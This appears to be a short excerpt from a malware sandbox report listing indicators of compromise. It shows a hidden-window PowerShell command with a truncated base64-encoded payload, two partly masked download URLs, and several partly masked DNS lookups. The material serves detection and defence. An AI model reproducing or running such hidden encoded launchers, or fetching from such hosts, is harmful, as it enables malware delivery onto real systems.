Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABKAHQAbgB1AHYAbwBuAGkAbABoAHoAPQAnAFkAaABoAG0AdwBpAGMAcQBkAHQAJwA7ACQAQgBuAGsAcABnAGQAdwBsACAAPQAgACcANgAwADgAJwA7ACQASwBxAGoAcwByAGMAcgBuAGMAeQBmAD0AJwBZAG4...
- http://rp###upltd.com/4hikw/rBKp/
- http://si###s.com.br/my_picked_ads/4MJayy/
- DNS ASK rp###upltd.com
- DNS ASK si###s.com.br
- DNS ASK mi####liberados.com
- DNS ASK kr####samachar.com
- DNS ASK yz##h.com